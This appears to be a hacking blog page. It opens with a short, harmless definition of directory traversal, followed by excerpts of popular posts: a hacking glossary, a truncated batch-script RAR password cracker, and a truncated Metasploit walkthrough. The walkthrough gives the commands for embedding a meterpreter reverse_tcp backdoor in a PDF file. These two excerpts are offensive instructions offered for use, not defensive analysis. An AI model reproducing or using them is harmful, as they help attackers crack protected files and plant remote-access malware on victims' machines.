Directory Traversal

-
Directory Traversal

Directory Traversal refers to the attack in which an authenticated or unauthenticated user can request and view or execute files which reside outside the root directory of a web application,or outside a directory in which they should be restricted to.This results in an attacker being able to read any file which the user running the webserver (commonlywww-data)has access to.If a server has misconfigured file permissions (verycommon),then this attack can be further escalated.

Popular posts from this blog

⚠️List of terms used in the field of hacking.⚠️

-
Image
🚩Adware − Adware is software designed to force pre-chosen ads to display on your system. 🚩Attack − An attack is an action that is done on a system to get its access and extract sensitive data. 🚩Back door − A back door, or trap door, is a hidden entry to a computing device or software that bypasses security measures, such as logins and password protections. 🚩Bot − A bot is a program that automates an action so that it can be done repeatedly at a much higher rate for a more sustained period than a human operator could do it. For example, sending HTTP, FTP or Telnet at a higher rate or calling script to create objects at a higher rate. 🚩Botnet − A botnet, also known as zombie army, is a group of computers controlled without their owners’ knowledge. Botnets are used to send spam or make denial of service attacks. 🚩Brute force attack − A brute force attack is an automated and the simplest kind of method to gain access to a system or website. It tries different combinatio...
Read more

how to crack password of Rar File.

-
Image
__Step 1: Open Notepad__ Open your Notepad Start » Run » Type ”Notepad” » Enter Step 2: Create Batch File Copy The Following code in notepad. REM ============================================================ REM www.devkhilar.tech @echo off title Rar Password Cracker mode con: cols=47 lines=20 copy “C:\Program Files\WinRAR\Unrar.exe” SET PSWD=0 SET DEST=%TEMP%\%RANDOM% MD %DEST% :RAR cls echo ———————————————- echo GET DETAIL echo ———————————————- echo. SET/P “NAME=Enter File Name : ” IF “%NAME%”==”” goto NERROR goto GPATH :NERROR echo ———————————————- echo ERROR echo ———————————————- echo Sorry you can’t leave it blank. pause goto RAR :GPATH SET/P “PATH=Enter Full Path : ” IF “%PATH%”==”” goto PERROR goto NEXT :PERROR echo ———————————————- echo ERROR echo ———————————————- echo Sorry you can’t leave it blank. pause goto RAR :NEXT IF EXIST “%PATH%\%NAME%” GOTO START goto PATH :PATH cls echo ———————————————- echo ...
Read more

🔥How to Embed a backdoor in a PDF file❓

-
Image
🔥How to Embed a backdoor in a PDF file❓ Step 1)Run Metasploit Step2) Find the Appropriate Exploit. I will search metasploits database for an exploit for adobe pdf on windows, using this command: ●Code:msf > search type:exploit platform:windows adobe pdf You should see the exploit "exploit/windows/fileformat/adobe_pdf_embedded_exe", which we will use: ●Code:msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe Step 3) Set the Payload I will use the meterpreter payload again, because it is one of the most powerful payloads available to us: ●Code:msf > exploit (adobe_pdf_embedded_exe) > set payload windows/meterpreter/reverse_tcp Step 4) Set the exploit options First, display the required options for the exploit: ●Code:msf > exploit (adobe_pdf_embedded_exe) > show options You can see that we must provide an existing PDF file to the INFILENAME option in which to embed the meterpreter payload. I will call it "hemantexample...
Read more